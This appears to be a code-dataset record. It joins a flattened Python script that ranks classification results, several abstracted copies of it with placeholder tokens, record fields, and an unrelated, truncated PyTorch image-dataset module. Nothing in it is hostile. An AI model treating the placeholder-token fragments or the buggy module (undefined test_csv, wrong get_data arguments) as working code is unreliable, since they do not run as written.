import os import pandas as pd from tabulate import tabulate if __name__ == '__main__': bestPrecision = [0,0,0,0,0,0] bestPrecisionFile = ['','','','','',''] bestRecall = [0,0,0,0,0,0] bestRecallFile = ['','','','','',''] bestSupport = [0,0,0,0,0,0] bestSupportFile = ['','','','','',''] bestF1_Score = [0,0,0,0,0,0] bestF1_ScoreFile = ['','','','','',''] bestPrecisionOverall = 0 bestPrecisionOverallFile = '' bestRecallOverall = 0 bestRecallOverallFile = '' bestSupportOverall = 0 bestSupportOverallFile = '' bestF1_ScoreOverall = 0 bestF1_ScoreOverallFile = '' for file in os.listdir("results"): # (0.359*a)+(0.256*b)+(0.205*c)+(0.087*d)+(0.073*e)+(0.016*f) df = pd.read_csv("results/"+file) for i in range(0,6): if bestF1_Score[i] < df["f1_score"][i]: bestF1_Score[i] = df["f1_score"][i] bestF1_ScoreFile[i]=file if bestPrecision[i] < df["precision"][i]: bestPrecision[i] = df["precision"][i] bestPrecisionFile[i] = file if bestRecall[i] < df["recall"][i]: bestRecall[i] = df["recall"][i] bestRecallFile[i] = file if bestSupport[i] < df["support"][i]: bestSupport[i] = df["support"][i] bestSupportFile[i] = file currPrecision = 0 currRecall = 0 currSupport = 0 currF1_Score = 0 for idx,value in enumerate([0.359,0.256,0.205,0.087,0.073,0.016]): currF1_Score += (value * df["f1_score"][idx]) currPrecision += (value * df["precision"][idx]) currRecall += (value * df["recall"][idx]) currSupport += (value * df["support"][idx]) if currPrecision > bestPrecisionOverall: bestPrecisionOverall=currPrecision bestPrecisionOverallFile = file print(file) print(bestPrecisionOverall) if currRecall > bestRecallOverall: bestRecallOverall=currRecall bestRecallOverallFile = file if currSupport > bestSupportOverall: bestSupportOverall=currSupport bestSupportOverallFile = file if currF1_Score > bestF1_ScoreOverall: bestF1_ScoreOverall=currF1_Score bestF1_ScoreOverallFile = file bestPrecision.insert(0,"Precision") bestPrecisionFile.insert(0, "Precision") bestRecall.insert(0, "Recall") bestRecallFile.insert(0, "Recall") bestSupport.insert(0, "Support") bestSupportFile.insert(0, "Support") bestF1_Score.insert(0, "F1_SCORE") bestF1_ScoreFile.insert(0, "F1_SCORE") tableSpecific = [["","Class0","Class1","Class2","Class3","Class4","Class5"], bestPrecision,bestPrecisionFile,bestRecall,bestRecallFile, bestSupport,bestSupportFile,bestF1_Score,bestF1_ScoreFile] tableGeneral = [ ["Precision Best","Recall Best","Support Best","F1_Score Best"], [bestPrecisionOverall,bestRecallOverall,bestSupportOverall,bestF1_ScoreOverall], [bestPrecisionOverallFile,bestRecallOverallFile,bestSupportOverallFile,bestF1_ScoreOverallFile]] print(tabulate(tableSpecific)) print(tabulate(tableGeneral))
[ "import os\nimport pandas as pd\nfrom tabulate import tabulate\n\nif __name__ == '__main__':\n\n bestPrecision = [0,0,0,0,0,0]\n bestPrecisionFile = ['','','','','','']\n bestRecall = [0,0,0,0,0,0]\n bestRecallFile = ['','','','','','']\n bestSupport = [0,0,0,0,0,0]\n bestSupportFile = ['','','','','','']\n bestF1_Score = [0,0,0,0,0,0]\n bestF1_ScoreFile = ['','','','','','']\n\n bestPrecisionOverall = 0\n bestPrecisionOverallFile = ''\n bestRecallOverall = 0\n bestRecallOverallFile = ''\n bestSupportOverall = 0\n bestSupportOverallFile = ''\n bestF1_ScoreOverall = 0\n bestF1_ScoreOverallFile = ''\n\n for file in os.listdir(\"results\"):\n\n # (0.359*a)+(0.256*b)+(0.205*c)+(0.087*d)+(0.073*e)+(0.016*f)\n df = pd.read_csv(\"results/\"+file)\n\n for i in range(0,6):\n if bestF1_Score[i] < df[\"f1_score\"][i]:\n bestF1_Score[i] = df[\"f1_score\"][i]\n bestF1_ScoreFile[i]=file\n if bestPrecision[i] < df[\"precision\"][i]:\n bestPrecision[i] = df[\"precision\"][i]\n bestPrecisionFile[i] = file\n if bestRecall[i] < df[\"recall\"][i]:\n bestRecall[i] = df[\"recall\"][i]\n bestRecallFile[i] = file\n if bestSupport[i] < df[\"support\"][i]:\n bestSupport[i] = df[\"support\"][i]\n bestSupportFile[i] = file\n\n currPrecision = 0\n currRecall = 0\n currSupport = 0\n currF1_Score = 0\n\n for idx,value in enumerate([0.359,0.256,0.205,0.087,0.073,0.016]):\n currF1_Score += (value * df[\"f1_score\"][idx])\n currPrecision += (value * df[\"precision\"][idx])\n currRecall += (value * df[\"recall\"][idx])\n currSupport += (value * df[\"support\"][idx])\n\n if currPrecision > bestPrecisionOverall:\n bestPrecisionOverall=currPrecision\n bestPrecisionOverallFile = file\n print(file)\n print(bestPrecisionOverall)\n if currRecall > bestRecallOverall:\n bestRecallOverall=currRecall\n bestRecallOverallFile = file\n if currSupport > bestSupportOverall:\n bestSupportOverall=currSupport\n bestSupportOverallFile = file\n if currF1_Score > bestF1_ScoreOverall:\n bestF1_ScoreOverall=currF1_Score\n bestF1_ScoreOverallFile = file\n\n bestPrecision.insert(0,\"Precision\")\n bestPrecisionFile.insert(0, \"Precision\")\n bestRecall.insert(0, \"Recall\")\n bestRecallFile.insert(0, \"Recall\")\n bestSupport.insert(0, \"Support\")\n bestSupportFile.insert(0, \"Support\")\n bestF1_Score.insert(0, \"F1_SCORE\")\n bestF1_ScoreFile.insert(0, \"F1_SCORE\")\n\n tableSpecific = [[\"\",\"Class0\",\"Class1\",\"Class2\",\"Class3\",\"Class4\",\"Class5\"],\n bestPrecision,bestPrecisionFile,bestRecall,bestRecallFile,\n bestSupport,bestSupportFile,bestF1_Score,bestF1_ScoreFile]\n\n tableGeneral = [ [\"Precision Best\",\"Recall Best\",\"Support Best\",\"F1_Score Best\"],\n [bestPrecisionOverall,bestRecallOverall,bestSupportOverall,bestF1_ScoreOverall],\n [bestPrecisionOverallFile,bestRecallOverallFile,bestSupportOverallFile,bestF1_ScoreOverallFile]]\n\n print(tabulate(tableSpecific))\n print(tabulate(tableGeneral))\n", "import os\nimport pandas as pd\nfrom tabulate import tabulate\nif __name__ == '__main__':\n bestPrecision = [0, 0, 0, 0, 0, 0]\n bestPrecisionFile = ['', '', '', '', '', '']\n bestRecall = [0, 0, 0, 0, 0, 0]\n bestRecallFile = ['', '', '', '', '', '']\n bestSupport = [0, 0, 0, 0, 0, 0]\n bestSupportFile = ['', '', '', '', '', '']\n bestF1_Score = [0, 0, 0, 0, 0, 0]\n bestF1_ScoreFile = ['', '', '', '', '', '']\n bestPrecisionOverall = 0\n bestPrecisionOverallFile = ''\n bestRecallOverall = 0\n bestRecallOverallFile = ''\n bestSupportOverall = 0\n bestSupportOverallFile = ''\n bestF1_ScoreOverall = 0\n bestF1_ScoreOverallFile = ''\n for file in os.listdir('results'):\n df = pd.read_csv('results/' + file)\n for i in range(0, 6):\n if bestF1_Score[i] < df['f1_score'][i]:\n bestF1_Score[i] = df['f1_score'][i]\n bestF1_ScoreFile[i] = file\n if bestPrecision[i] < df['precision'][i]:\n bestPrecision[i] = df['precision'][i]\n bestPrecisionFile[i] = file\n if bestRecall[i] < df['recall'][i]:\n bestRecall[i] = df['recall'][i]\n bestRecallFile[i] = file\n if bestSupport[i] < df['support'][i]:\n bestSupport[i] = df['support'][i]\n bestSupportFile[i] = file\n currPrecision = 0\n currRecall = 0\n currSupport = 0\n currF1_Score = 0\n for idx, value in enumerate([0.359, 0.256, 0.205, 0.087, 0.073, 0.016]\n ):\n currF1_Score += value * df['f1_score'][idx]\n currPrecision += value * df['precision'][idx]\n currRecall += value * df['recall'][idx]\n currSupport += value * df['support'][idx]\n if currPrecision > bestPrecisionOverall:\n bestPrecisionOverall = currPrecision\n bestPrecisionOverallFile = file\n print(file)\n print(bestPrecisionOverall)\n if currRecall > bestRecallOverall:\n bestRecallOverall = currRecall\n bestRecallOverallFile = file\n if currSupport > bestSupportOverall:\n bestSupportOverall = currSupport\n bestSupportOverallFile = file\n if currF1_Score > bestF1_ScoreOverall:\n bestF1_ScoreOverall = currF1_Score\n bestF1_ScoreOverallFile = file\n bestPrecision.insert(0, 'Precision')\n bestPrecisionFile.insert(0, 'Precision')\n bestRecall.insert(0, 'Recall')\n bestRecallFile.insert(0, 'Recall')\n bestSupport.insert(0, 'Support')\n bestSupportFile.insert(0, 'Support')\n bestF1_Score.insert(0, 'F1_SCORE')\n bestF1_ScoreFile.insert(0, 'F1_SCORE')\n tableSpecific = [['', 'Class0', 'Class1', 'Class2', 'Class3', 'Class4',\n 'Class5'], bestPrecision, bestPrecisionFile, bestRecall,\n bestRecallFile, bestSupport, bestSupportFile, bestF1_Score,\n bestF1_ScoreFile]\n tableGeneral = [['Precision Best', 'Recall Best', 'Support Best',\n 'F1_Score Best'], [bestPrecisionOverall, bestRecallOverall,\n bestSupportOverall, bestF1_ScoreOverall], [bestPrecisionOverallFile,\n bestRecallOverallFile, bestSupportOverallFile, bestF1_ScoreOverallFile]\n ]\n print(tabulate(tableSpecific))\n print(tabulate(tableGeneral))\n", "<import token>\nif __name__ == '__main__':\n bestPrecision = [0, 0, 0, 0, 0, 0]\n bestPrecisionFile = ['', '', '', '', '', '']\n bestRecall = [0, 0, 0, 0, 0, 0]\n bestRecallFile = ['', '', '', '', '', '']\n bestSupport = [0, 0, 0, 0, 0, 0]\n bestSupportFile = ['', '', '', '', '', '']\n bestF1_Score = [0, 0, 0, 0, 0, 0]\n bestF1_ScoreFile = ['', '', '', '', '', '']\n bestPrecisionOverall = 0\n bestPrecisionOverallFile = ''\n bestRecallOverall = 0\n bestRecallOverallFile = ''\n bestSupportOverall = 0\n bestSupportOverallFile = ''\n bestF1_ScoreOverall = 0\n bestF1_ScoreOverallFile = ''\n for file in os.listdir('results'):\n df = pd.read_csv('results/' + file)\n for i in range(0, 6):\n if bestF1_Score[i] < df['f1_score'][i]:\n bestF1_Score[i] = df['f1_score'][i]\n bestF1_ScoreFile[i] = file\n if bestPrecision[i] < df['precision'][i]:\n bestPrecision[i] = df['precision'][i]\n bestPrecisionFile[i] = file\n if bestRecall[i] < df['recall'][i]:\n bestRecall[i] = df['recall'][i]\n bestRecallFile[i] = file\n if bestSupport[i] < df['support'][i]:\n bestSupport[i] = df['support'][i]\n bestSupportFile[i] = file\n currPrecision = 0\n currRecall = 0\n currSupport = 0\n currF1_Score = 0\n for idx, value in enumerate([0.359, 0.256, 0.205, 0.087, 0.073, 0.016]\n ):\n currF1_Score += value * df['f1_score'][idx]\n currPrecision += value * df['precision'][idx]\n currRecall += value * df['recall'][idx]\n currSupport += value * df['support'][idx]\n if currPrecision > bestPrecisionOverall:\n bestPrecisionOverall = currPrecision\n bestPrecisionOverallFile = file\n print(file)\n print(bestPrecisionOverall)\n if currRecall > bestRecallOverall:\n bestRecallOverall = currRecall\n bestRecallOverallFile = file\n if currSupport > bestSupportOverall:\n bestSupportOverall = currSupport\n bestSupportOverallFile = file\n if currF1_Score > bestF1_ScoreOverall:\n bestF1_ScoreOverall = currF1_Score\n bestF1_ScoreOverallFile = file\n bestPrecision.insert(0, 'Precision')\n bestPrecisionFile.insert(0, 'Precision')\n bestRecall.insert(0, 'Recall')\n bestRecallFile.insert(0, 'Recall')\n bestSupport.insert(0, 'Support')\n bestSupportFile.insert(0, 'Support')\n bestF1_Score.insert(0, 'F1_SCORE')\n bestF1_ScoreFile.insert(0, 'F1_SCORE')\n tableSpecific = [['', 'Class0', 'Class1', 'Class2', 'Class3', 'Class4',\n 'Class5'], bestPrecision, bestPrecisionFile, bestRecall,\n bestRecallFile, bestSupport, bestSupportFile, bestF1_Score,\n bestF1_ScoreFile]\n tableGeneral = [['Precision Best', 'Recall Best', 'Support Best',\n 'F1_Score Best'], [bestPrecisionOverall, bestRecallOverall,\n bestSupportOverall, bestF1_ScoreOverall], [bestPrecisionOverallFile,\n bestRecallOverallFile, bestSupportOverallFile, bestF1_ScoreOverallFile]\n ]\n print(tabulate(tableSpecific))\n print(tabulate(tableGeneral))\n", "<import token>\n<code token>\n" ]
false
80
5b8c95354f8b27eff8226ace52ab9e97f98ae217
from dai_imports import* from obj_utils import* import utils class my_image_csv_dataset(Dataset): def __init__(self, data_dir, data, transforms_ = None, obj = False, minorities = None, diffs = None, bal_tfms = None): self.data_dir = data_dir self.data = data self.transforms_ = transforms_ self.tfms = None self.obj = obj self.minorities = minorities self.diffs = diffs self.bal_tfms = bal_tfms assert transforms_ is not None, print('Please pass some transforms.') def __len__(self): return len(self.data) def __getitem__(self, index): img_path = os.path.join(self.data_dir,self.data.iloc[index, 0]) img = Image.open(img_path) img = img.convert('RGB') img = torchvision.transforms.functional.to_grayscale(img,num_output_channels=3) y = self.data.iloc[index, 1] if self.minorities and self.bal_tfms: if y in self.minorities: if hasattr(self.bal_tfms,'transforms'): for tr in self.bal_tfms.transforms: tr.p = self.diffs[y] l = [self.bal_tfms] l.extend(self.transforms_) self.tfms = transforms.Compose(l) else: for t in self.bal_tfms: t.p = self.diffs[y] self.transforms_[1:1] = self.bal_tfms self.tfms = transforms.Compose(self.transforms_) # print(self.tfms) else: self.tfms = transforms.Compose(self.transforms_) else: self.tfms = transforms.Compose(self.transforms_) x = self.tfms(img) if self.obj: s = x.size()[1] if isinstance(s,tuple): s = s[0] row_scale = s/img.size[0] col_scale = s/img.size[1] y = rescale_bbox(y,row_scale,col_scale) y.squeeze_() y2 = self.data.iloc[index, 2] y = (y,y2) return (x,y) class my_image_folder(DatasetFolder): def __init__(self, root, transform=None, target_transform=None, loader=default_loader, minorities=None, diffs = None, bal_tfms=None, tta_tfms = None): super(my_image_folder, self).__init__(root, loader, IMG_EXTENSIONS, transform=transform, target_transform=target_transform) self.imgs = self.samples self.minorities = minorities self.diffs = diffs self.bal_tfms = bal_tfms self.tta_tfms = tta_tfms self.tfms = None def __getitem__(self,index): path, target = self.samples[index] sample = self.loader(path) if self.transform: if self.minorities and self.bal_tfms: if target in self.minorities: if hasattr(self.bal_tfms,'transforms'): for tr in self.bal_tfms.transforms: tr.p = self.diffs[target] l = [self.bal_tfms] l.extend(self.transform) self.tfms = transforms.Compose(l) else: for t in self.bal_tfms: t.p = self.diffs[target] self.tfms = transforms.Compose(self.bal_tfms + self.transform ) else: self.tfms = transforms.Compose(self.transform) elif self.tta_tfms: self.tfms = self.tta_tfms else: self.tfms = transforms.Compose(self.transform) sample = self.tfms(sample) if self.target_transform: target = self.target_transform(target) return sample, target def extract_data(dt): x = [] y = [] for a,b in dt: x.append(a) y.append(b) return x,y def listdir_fullpath(d): return [os.path.join(d, f) for f in os.listdir(d)] def get_minorities(df,thresh=0.8): c = df.iloc[:,1].value_counts() lc = list(c) max_count = lc[0] diffs = [1-(x/max_count) for x in lc] diffs = dict((k,v) for k,v in zip(c.keys(),diffs)) minorities = [c.keys()[x] for x,y in enumerate(lc) if y < (thresh*max_count)] return minorities,diffs def csv_from_path(path, img_dest): path = Path(path) img_dest = Path(img_dest) labels_paths = list(path.iterdir()) tr_images = [] tr_labels = [] for l in labels_paths: if l.is_dir(): for i in list(l.iterdir()): if i.suffix in IMG_EXTENSIONS: name = i.name label = l.name new_name = '{}_{}'.format(path.name,name) new_path = img_dest/new_name # print(new_path) os.rename(i,new_path) tr_images.append(new_name) tr_labels.append(label) # os.rmdir(l) tr_img_label = {'Img':tr_images, 'Label': tr_labels} csv = pd.DataFrame(tr_img_label,columns=['Img','Label']) csv = csv.sample(frac=1).reset_index(drop=True) return csv def add_extension(a,e): a = [x+e for x in a] return a def one_hot(targets, multi = False): if multi: binerizer = MultiLabelBinarizer() dai_1hot = binerizer.fit_transform(targets) else: binerizer = LabelBinarizer() dai_1hot = binerizer.fit_transform(targets) return dai_1hot,binerizer.classes_ def get_index(arr,a): for i in range(len(arr)): if sum(arr[i] == a) == len(a): return i return False def rescale_bbox(bb,row_scale,col_scale): bb = bb.reshape((-1,4)) for b in bb: r1,c1,r2,c2 = b b[0] = int(np.round(r1*col_scale)) b[1] = int(np.round(c1*row_scale)) b[2] = int(np.round(r2*col_scale)) b[3] = int(np.round(c2*row_scale)) # bb = torch.tensor([bb_hw(b) for b in bb.reshape(-1,4)]) # for b in bb: # r1,c1,r2,c2 = b # b[0] = int(np.round(r1*row_scale)) # b[1] = int(np.round(c1*col_scale)) # b[2] = int(np.round(r2*row_scale)) # b[3] = int(np.round(c2*col_scale)) # if(sum(b)) == 1: # b[0],b[1],b[2],b[3] = 0,0,0,0 bb = bb.reshape((1,-1)) return bb def get_img_stats(dataset,sz): size = int(len(dataset)*sz) i = 0 imgs = [] for img,_ in dataset: # print(img.size()) if i > size: break imgs.append(img) i+=1 imgs_ = torch.stack(imgs,dim=3) imgs_ = imgs_.view(3,-1) imgs_mean = imgs_.mean(dim=1) imgs_std = imgs_.std(dim=1) return imgs_mean,imgs_std def split_df(train_df,test_size = 0.15): try: train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2,stratify = train_df.iloc[:,1]) except: train_df,val_df = train_test_split(train_df,test_size = test_size,random_state = 2) train_df = train_df.reset_index(drop = True) val_df = val_df.reset_index(drop = True) return train_df,val_df def save_obj(obj, path): with open(path, 'wb') as f: pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL) def load_obj(path): with open(path, 'rb') as f: return pickle.load(f) class DataProcessor: def __init__(self, data_path = None, train_csv = None, val_csv = None, reg = False, tr_name = 'train', val_name = 'val', test_name = 'test', extension = None, setup_data = True): print('+------------------------------------+') print('| Dream AI |') print('+------------------------------------+') print() self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") self.data_path,self.train_csv,self.val_csv,self.reg,self.tr_name,self.val_name,self.test_name,self.extension = (data_path,train_csv, val_csv,reg,tr_name,val_name,test_name,extension) self.obj = False self.multi_label = False if setup_data: self.set_up_data() def set_up_data(self,split_size = 0.15): data_path,train_csv,val_csv,tr_name,val_name,test_name = (self.data_path,self.train_csv,self.val_csv,self.tr_name,self.val_name,self.test_name) # check if paths given and also set paths if not data_path: data_path = os.getcwd() + '/' tr_path = os.path.join(data_path,tr_name) val_path = os.path.join(data_path,val_name) test_path = os.path.join(data_path,test_name) if os.path.exists(os.path.join(data_path,tr_name+'.csv')): train_csv = tr_name+'.csv' # if os.path.exists(os.path.join(data_path,val_name+'.csv')): # val_csv = val_name+'.csv' # if os.path.exists(os.path.join(data_path,test_name+'.csv')): # test_csv = test_name+'.csv' # paths to csv if not train_csv: print('no') train_csv,val_csv,test_csv = self.data_from_paths_to_csv(data_path,tr_path,val_path,test_path) train_csv_path = os.path.join(data_path,train_csv) train_df = pd.read_csv(train_csv_path) if 'Unnamed: 0' in train_df.columns: train_df = train_df.drop('Unnamed: 0', 1) if len(train_df.columns) > 2: self.obj = True img_names = [str(x) for x in list(train_df.iloc[:,0])] if self.extension: img_names = add_extension(img_names,self.extension) if val_csv: val_csv_path = os.path.join(data_path,val_csv) val_df = pd.read_csv(val_csv_path) val_targets = list(map(str,list(val_df.iloc[:,1]))) if test_csv: test_csv_path = os.path.join(data_path,test_csv) test_df = pd.read_csv(test_csv_path) test_targets = list(map(str,list(test_df.iloc[:,1]))) targets = list(map(str,list(train_df.iloc[:,1]))) lengths = [len(t) for t in [s.split() for s in targets]] self.target_lengths = lengths split_targets = [t.split() for t in targets] if self.obj: print('\nObject Detection\n') # bounding boxes int_targets = [list(map(float,x)) for x in split_targets] zero_targets = np.zeros((len(targets),max(lengths)),dtype=int) for i,t in enumerate(zero_targets): t[len(t)-len(int_targets[i]):] = int_targets[i] zero_targets[i] = t train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets] # one-hot classes obj_targets = list(map(str,list(train_df.iloc[:,2]))) obj_split_targets = [t.split() for t in obj_targets] try: obj_split_targets = [list(map(int,x)) for x in obj_split_targets] except: pass dai_onehot,onehot_classes = one_hot(obj_split_targets,True) # train_df['one_hot'] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot] # class indexes c_names = list(onehot_classes) class_idx = [[c_names.index(i) for i in c] for c in obj_split_targets] zero_idx = np.zeros((len(targets),max(lengths)//4),dtype=int) # print(zero_idx.shape) for i,t in enumerate(zero_idx): # temp_l = len(class_idx[i]) # if temp_l > 90: # print(i,temp_l) t[len(t)-len(class_idx[i]):] = class_idx[i] zero_idx[i] = t train_df.iloc[:,2] = [torch.from_numpy(z).type(torch.LongTensor) for z in zero_idx] self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes # self.set_up_object_detection([4,2,1],[0.7, 1., 1.3],[(1.,1.), (1.,0.5), (0.5,1.)]) elif self.reg: print('\nRegression\n') int_targets = [list(map(int,x)) for x in split_targets] zero_targets = np.zeros((len(targets),max(lengths)),dtype=int) for i,t in enumerate(zero_targets): t[len(t)-len(int_targets[i]):] = int_targets[i] zero_targets[i] = t train_df.iloc[:,1] = [torch.from_numpy(z).type(torch.FloatTensor) for z in zero_targets] self.data_dir,self.num_classes,self.class_names = data_path, max(lengths),np.unique(zero_targets,axis=1) elif lengths[1:] != lengths[:-1]: self.multi_label = True print('\nMulti-label Classification\n') try: split_targets = [list(map(int,x)) for x in split_targets] except: pass dai_onehot,onehot_classes = one_hot(split_targets,self.multi_label) train_df.iloc[:,1] = [torch.from_numpy(x).type(torch.FloatTensor) for x in dai_onehot] self.data_dir,self.num_classes,self.class_names = data_path,len(onehot_classes),onehot_classes else: print('\nSingle-label Classification\n') unique_targets = list(np.unique(targets)) target_ids = [unique_targets.index(x) for x in targets] train_df.iloc[:,1] = target_ids if val_csv: target_ids = [unique_targets.index(x) for x in val_targets] val_df.iloc[:,1] = target_ids if test_csv: target_ids = [unique_targets.index(x) for x in test_targets] test_df.iloc[:,1] = target_ids self.data_dir,self.num_classes,self.class_names = data_path,len(unique_targets),unique_targets # self.models_path = os.path.join(self.data_dir, 'models') # os.makedirs(self.models_path,exist_ok=True) if not val_csv: train_df,val_df = split_df(train_df,split_size) if not test_csv: val_df,test_df = split_df(val_df,split_size) tr_images = [str(x) for x in list(train_df.iloc[:,0])] val_images = [str(x) for x in list(val_df.iloc[:,0])] test_images = [str(x) for x in list(test_df.iloc[:,0])] if self.extension: tr_images = add_extension(tr_images,self.extension) val_images = add_extension(val_images,self.extension) test_images = add_extension(test_images,self.extension) train_df.iloc[:,0] = tr_images val_df.iloc[:,0] = val_images test_df.iloc[:,0] = test_images train_df.to_csv(os.path.join(data_path,'train.csv'),index=False) val_df.to_csv(os.path.join(data_path,'val.csv'),index=False) test_df.to_csv(os.path.join(data_path,'test.csv'),index=False) self.minorities,self.class_diffs = None,None if (not self.obj) or (not self.multi_label): self.minorities,self.class_diffs = get_minorities(train_df) self.data_dfs = {self.tr_name:train_df, self.val_name:val_df, self.test_name:test_df} data_dict = {'data_dfs':self.data_dfs,'data_dir':self.data_dir,'num_classes':self.num_classes,'class_names':self.class_names, 'minorities':self.minorities,'class_diffs':self.class_diffs,'obj':self.obj,'multi_label':self.multi_label} # save_obj(data_dict,os.path.join(self.data_dir,'data_dict.pkl')) self.data_dict = data_dict return data_dict def data_from_paths_to_csv(self,data_path,tr_path,val_path = None,test_path = None): train_df = csv_from_path(tr_path,tr_path) train_df.to_csv(os.path.join(data_path,self.tr_name+'.csv'),index=False) ret = (self.tr_name+'.csv',None) if val_path is not None: val_exists = os.path.exists(val_path) if val_exists: val_df = csv_from_path(val_path,tr_path) val_df.to_csv(os.path.join(data_path,self.val_name+'.csv'),index=False) ret = (self.tr_name+'.csv',self.val_name+'.csv') if test_path is not None: test_exists = os.path.exists(test_path) if test_exists: test_df = csv_from_path(test_path,tr_path) test_df.to_csv(os.path.join(data_path,self.test_name+'.csv'),index=False) ret = (self.tr_name+'.csv',self.val_name+'.csv',self.test_name+'.csv') return ret def get_data(self, data_dict = None, s = (224,224), dataset = my_image_csv_dataset, bs = 32, balance = False, tfms = None, bal_tfms = None, tta = False, num_workers = 4, stats_percentage = 0.6): self.image_size = s if not data_dict: data_dict = self.data_dict data_dfs,data_dir,minorities,class_diffs,obj,multi_label = (data_dict['data_dfs'],data_dict['data_dir'],data_dict['minorities'], data_dict['class_diffs'],data_dict['obj'],data_dict['multi_label']) if obj or multi_label: balance = False if tta: tta_tfms = {self.tr_name: transforms.Compose( [ # transforms.TenCrop(s), transforms.FiveCrop(s[0]), transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])), transforms.Lambda(lambda crops:torch.stack( [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops])) ]), self.val_name: transforms.Compose( [ # transforms.TenCrop(s), transforms.FiveCrop(s[0]), transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])), transforms.Lambda(lambda crops:torch.stack( [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops])) ]), self.test_name: transforms.Compose( [ # transforms.TenCrop(s), transforms.FiveCrop(s[0]), transforms.Lambda(lambda crops:torch.stack([transforms.ToTensor()(crop) for crop in crops])), transforms.Lambda(lambda crops:torch.stack( [transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(crop) for crop in crops])) ])} # tta_tfms = {self.tr_name: transforms.Compose([ # transforms.Resize(s), # transforms.ToTensor(), # transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # ]), # self.val_name: transforms.Compose([ # transforms.Resize(s), # transforms.ToTensor(), # transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) # ]) } else: tta_tfms = None if not bal_tfms: bal_tfms = { self.tr_name: [transforms.RandomHorizontalFlip()], self.val_name: None, self.test_name: None } else: bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.test_name: None} if obj: resize_transform = transforms.Resize(s) else: # resize_transform = transforms.RandomResizedCrop(s[0]) resize_transform = transforms.Resize(s) if not tfms: tfms = [ resize_transform, transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ] else: tfms_temp = [ resize_transform, transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ] tfms_temp[1:1] = tfms tfms = tfms_temp print(tfms) data_transforms = { self.tr_name: tfms, self.val_name: [ # transforms.Resize(s[0]+50), # transforms.CenterCrop(s[0]), transforms.Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ], self.test_name: [ # transforms.Resize(s[0]+50), # transforms.CenterCrop(s[0]), transforms.Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) ] } temp_tfms = [resize_transform, transforms.ToTensor()] temp_dataset = dataset(os.path.join(data_dir,self.tr_name),data_dfs[self.tr_name],temp_tfms) self.img_mean,self.img_std = get_img_stats(temp_dataset,stats_percentage) data_transforms[self.tr_name][-1].mean,data_transforms[self.tr_name][-1].std = self.img_mean,self.img_std data_transforms[self.val_name][-1].mean,data_transforms[self.val_name][-1].std = self.img_mean,self.img_std data_transforms[self.test_name][-1].mean,data_transforms[self.test_name][-1].std = self.img_mean,self.img_std if balance: image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x], data_transforms[x],obj,minorities,class_diffs,bal_tfms[x]) for x in [self.tr_name, self.val_name, self.test_name]} else: image_datasets = {x: dataset(os.path.join(data_dir,self.tr_name),data_dfs[x], data_transforms[x],obj) for x in [self.tr_name, self.val_name, self.test_name]} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=bs, shuffle=True, num_workers=num_workers) for x in [self.tr_name, self.val_name, self.test_name]} dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name, self.val_name, self.test_name]} self.image_datasets,self.dataloaders,self.dataset_sizes = (image_datasets,dataloaders, dataset_sizes) return image_datasets,dataloaders,dataset_sizes def imshow(self,inp, title=None): """Imshow for Tensor.""" inp = self.denorm_img(inp) plt.imshow(inp) if title: plt.title(title) plt.pause(0.001) def denorm_img(self,inp,calculate = False): inp = inp.numpy().transpose((1, 2, 0)) if calculate: mean = np.mean(inp) std = np.std(inp) else: mean = self.img_mean.numpy() std = self.img_std.numpy() inp = std * inp + mean inp = np.clip(inp, 0, 1) return inp def show_data(self,folder_name = 'train', size = (64,64), bs = 5): self.get_data(size,bs) batch = next(iter(self.dataloaders[folder_name])) inputs, classes = batch[0],batch[1] out = torchvision.utils.make_grid(inputs) if self.reg: print(classes) self.imshow(out, title=[x for x in classes]) elif self.multi_label: self.imshow(out, title=[self.class_names[np.nonzero(x.type(torch.LongTensor))] for x in classes]) else: self.imshow(out, title=[self.class_names[x] for x in classes]) # def set_up_object_detection(self,anc_grids,anc_zooms,anc_ratios,num_colr = 12): # # print('Would you like to give your own values for anchor_grids, anchor_zooms,and anchor_ratios? The default values are: {}, {} and {}' # # .format(anc_grids,anc_zooms,anc_ratios)) # # print('If so, you may call the function "set_up_object_detection" with your own paramteres.') # cmap = get_cmap(num_colr) # self.colr_list = [cmap(float(x)) for x in range(num_colr)] # self.num_colr = num_colr # self.create_anchors(anc_grids,anc_zooms,anc_ratios) # self.custom_head = SSD_MultiHead(self.k,self.num_classes,0.45,-4.) # self.loss_f = FocalLoss(self.num_classes) # def create_anchors(self,anc_grids,anc_zooms,anc_ratios): # anchor_scales = [(anz*i,anz*j) for anz in anc_zooms for (i,j) in anc_ratios] # k = len(anchor_scales) # anc_offsets = [1/(o*2) for o in anc_grids] # anc_x = np.concatenate([np.repeat(np.linspace(ao, 1-ao, ag), ag) # for ao,ag in zip(anc_offsets,anc_grids)]) # anc_y = np.concatenate([np.tile(np.linspace(ao, 1-ao, ag), ag) # for ao,ag in zip(anc_offsets,anc_grids)]) # anc_ctrs = np.repeat(np.stack([anc_x,anc_y], axis=1), k, axis=0) # anc_sizes = np.concatenate([np.array([[o/ag,p/ag] for i in range(ag*ag) for o,p in anchor_scales]) # for ag in anc_grids]) # 